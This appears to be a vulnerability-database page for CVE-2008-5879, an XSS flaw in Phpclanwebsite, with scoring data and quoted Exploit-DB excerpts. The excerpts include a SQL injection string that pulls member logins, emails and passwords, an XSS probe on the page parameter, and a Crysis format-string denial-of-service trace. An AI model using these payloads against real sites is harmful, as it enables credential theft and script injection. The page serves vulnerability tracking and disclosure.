CVE-2008-5879
published 2009-01-08CVE-2008-5879: Cross-site scripting (XSS) vulnerability in index.php in Phpclanwebsite (aka PCW) 1.23.3 Fix Pack 5 and earlier, allows remote attackers to inject arbitrary…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.45%
70.2th percentile
Cross-site scripting (XSS) vulnerability in index.php in Phpclanwebsite (aka PCW) 1.23.3 Fix Pack 5 and earlier, allows remote attackers to inject arbitrary web script or HTML via the page parameter and other unspecified vectors.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpclanwebsite | phpclanwebsite | <= 1.23.3 | — |
| phpclanwebsite | phpclanwebsite | — | — |
| phpclanwebsite | phpclanwebsite | — | — |
| phpclanwebsite | phpclanwebsite | — | — |
| phpclanwebsite | phpclanwebsite | — | — |
| phpclanwebsite | phpclanwebsite | — | — |
| phpclanwebsite | phpclanwebsite | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
phpclanwebsite 1.23.3 fix pack #5 - Multiple Vulnerabilities
exploitdb·2008-12-18
CVE-2008-5879 phpclanwebsite 1.23.3 fix pack #5 - Multiple Vulnerabilities
phpclanwebsite 1.23.3 fix pack #5 - Multiple Vulnerabilities
---
Phpclanwebsite 1)+limit+0+union+select+tag,2,3,login,5,6,7,email,9,password,11,12,13,14,15+from+cws_members--
etc
The note:
For operation of all SQL Injection vulnerabilities, except vulnerability in parametre "whichfield", are required disconnected magic_quotes_gpc.
3. Multiple Cross-site Scripting Vulnerabilities
The appendix everywhere does not check the variables transferred from outside of the user. It allows to carry out any code in a context of a user browser.
Examples of vulnerable files:
/index.php?page='>alert('XSS')
etc
# milw0rm.com [2008-12-18]
Exploit-DB
Crysis 1.1.1.5879 - Remote Format String Denial of Service (PoC)
exploitdb·2008-02-28
CVE-2008-1127 Crysis 1.1.1.5879 - Remote Format String Denial of Service (PoC)
Crysis 1.1.1.5879 - Remote Format String Denial of Service (PoC)
---
The Crysis engine passes along internal debug strings through the game. One of them is passed to vsprintf() in the crt lib:
30503263 8D8C24 10100000 LEA ECX,DWORD PTR SS:[ESP+1010]
3050326A 51 PUSH ECX
3050326B 50 PUSH EAX
3050326C 8D5424 08 LEA EDX,DWORD PTR SS:[ESP+8]
30503270 52 PUSH EDX
30503271 FF15 F8A17530 CALL DWORD PTR DS:[] ; MSVCR80.vsprintf
0032CAD8 30503277 w2P0 /CALL to vsprintf from cryactio.30503271
0032CADC 0032CAE8 èÊ2. |buffer = 0032CAE8
0032CAE0 0032DAF8 øÚ2. |format = "Pathfinding in animation graph failed (LONGPOKE%SAAAAAAAA) - no path from 'Parachute_Float_NW' to 'X_Combat_IdleAimingNull_NW'" ; Your name is passed in as part of the format. This is a nono...
0032CAE4 0032DAF8 øÚ2. \arglist
No writeups or analysis indexed.
http://secunia.com/advisories/33211http://securityreason.com/securityalert/4881http://www.securityfocus.com/bid/32915https://www.exploit-db.com/exploits/7515http://secunia.com/advisories/33211http://securityreason.com/securityalert/4881http://www.securityfocus.com/bid/32915https://www.exploit-db.com/exploits/7515
2009-01-08
Published